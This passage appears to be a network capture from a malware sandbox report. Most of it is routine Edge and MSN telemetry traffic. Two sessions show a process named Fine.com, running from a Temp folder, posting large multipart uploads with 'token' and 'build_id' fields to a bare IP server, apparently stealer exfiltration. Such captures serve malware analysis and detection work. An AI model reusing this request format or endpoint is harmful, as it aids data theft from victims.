                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          Cookie: UID=1EA27ce3b1ee0d790c63e791736698994; XID=1EA27ce3b1ee0d790c63e791736698994
2025-01-12 16:23:15 UTC | 326 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:15 GMT
                                                                                                                                                                                                                                                                                                                          Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                          Via: 1.1 932eefec422d884c28f3c110319f29fe.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: JFK52-P3
                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: 5e0izEHFpXAVKo_m9B-JVofGIMD39UrpPBti2c2M-7wLZPpUmmWnkQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 50106 | 20.110.205.119 | 443 | 7340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:16 UTC | 1271 | OUT | GET /c.gif?rnd=1736698992883&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=bfa5accca5c24be7a92be487d5e1a76b&activityId=bfa5accca5c24be7a92be487d5e1a76b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=9C9B0C5E00C44C8A8B186E4587E0FF4B&MUID=0DA5835E35016A581E46962C34736B24 HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: c.msn.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1; SM=T; _C_ETH=1
2025-01-12 16:23:16 UTC | 983 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 08 Jan 2025 16:37:23 GMT
                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                          ETag: "dda11c98eb61db1:0"
                                                                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                          P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                                          Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MUID=0DA5835E35016A581E46962C34736B24; domain=.msn.com; expires=Fri, 06-Feb-2026 16:23:16 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                                          Set-Cookie: SRM_M=0DA5835E35016A581E46962C34736B24; domain=c.msn.com; expires=Fri, 06-Feb-2026 16:23:16 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MR=0; domain=c.msn.com; expires=Sun, 19-Jan-2025 16:23:16 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                          Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Sun, 12-Jan-2025 16:33:16 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:15 GMT
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Content-Length: 42
2025-01-12 16:23:16 UTC | 42 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 50105 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:16 UTC | 185 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----A1VKFU3EKF3E37900ZM7
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 393697
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2025-01-12 16:23:16 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 4d 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------A1VKFU3EKF3E37900ZM7Content-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------A1VKFU3EKF3E37900ZM7Content-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------A1VKFU3EKF3E37900ZM7Cont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-12 16:23:17 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:17 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 50108 | 13.89.179.13 | 443 | 7340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:16 UTC | 1034 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736698994931&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 11429
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1; msnup=
2025-01-12 16:23:16 UTC | 11429 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-12T16:23:14.930Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"2d2f2ade-878a-4fa4-9b31-0597781bf307","epoch":"747445640"},"app":{"locale"
2025-01-12 16:23:16 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=b54b9a4a1cf141b48ac936a25dcc452a&HASH=b54b&LV=202501&V=4&LU=1736698996627; Domain=.microsoft.com; Expires=Mon, 12 Jan 2026 16:23:16 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=35f98d4a1f8f4bb492b496e29f8e333d; Domain=.microsoft.com; Expires=Sun, 12 Jan 2025 16:53:16 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          time-delta-millis: 1696
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:16 GMT
                                                                                                                                                                                                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50107 | 13.89.179.13 | 443 | 7340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:16 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736698994940&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 5054
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1; msnup=
2025-01-12 16:23:16 UTC | 5054 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-12T16:23:14.939Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"2d2f2ade-878a-4fa4-9b31-0597781bf307","epoch":"747445640"},"app":{"locale"
2025-01-12 16:23:16 UTC  890  IN  HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=d5627e09a8794c798abb171027cafb07&HASH=d562&LV=202501&V=4&LU=1736698996637; Domain=.microsoft.com; Expires=Mon, 12 Jan 2026 16:23:16 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=68957851355947e4bc24e81ead98052a; Domain=.microsoft.com; Expires=Sun, 12 Jan 2025 16:53:16 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          time-delta-millis: 1697
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:16 GMT
                                                                                                                                                                                                                                                                                                                          Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
38          192.168.2.5  50112        13.89.179.13    443               7340  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp  Bytes transferred  Direction  Data
2025-01-12 16:23:17 UTC  1043  OUT  POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736698995651&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 5335
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1; msnup=; _C_ETH=1
2025-01-12 16:23:17 UTC  5335  OUT  Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 32 54 31 36 3a 32 33 3a 31 35 2e 36 34 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 32 64 32 66 32 61 64 65 2d 38 37 38 61 2d 34 66 61 34 2d 39 62 33 31 2d 30 35 39 37 37 38 31 62 66 33 30 37 22 2c 22 65 70 6f 63 68 22 3a 22 37 34 37 34 34 35 36 34 30 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-12T16:23:15.649Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"2d2f2ade-878a-4fa4-9b31-0597781bf307","epoch":"747445640"},"app":{"locale"
2025-01-12 16:23:17 UTC  890  IN  HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=49bdfc107416414ca63f26d48f6d5acb&HASH=49bd&LV=202501&V=4&LU=1736698997190; Domain=.microsoft.com; Expires=Mon, 12 Jan 2026 16:23:17 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=52d8392af77f49c38a346cdec6622f9e; Domain=.microsoft.com; Expires=Sun, 12 Jan 2025 16:53:17 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          time-delta-millis: 1539
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:17 GMT
                                                                                                                                                                                                                                                                                                                          Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
39          192.168.2.5  50113        195.201.141.106  443               1440  C:\Users\user\AppData\Local\Temp\424372\Fine.com

Timestamp  Bytes transferred  Direction  Data
2025-01-12 16:23:17 UTC  185  OUT  POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----Q1VK6FCJW4E37Q9R9Z5X
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 131557
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2025-01-12 16:23:17 UTC  16355  OUT  Data Raw: 2d 2d 2d 2d 2d 2d 51 31 56 4b 36 46 43 4a 57 34 45 33 37 51 39 52 39 5a 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 51 31 56 4b 36 46 43 4a 57 34 45 33 37 51 39 52 39 5a 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 51 31 56 4b 36 46 43 4a 57 34 45 33 37 51 39 52 39 5a 35 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------Q1VK6FCJW4E37Q9R9Z5XContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------Q1VK6FCJW4E37Q9R9Z5XContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------Q1VK6FCJW4E37Q9R9Z5XCont
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
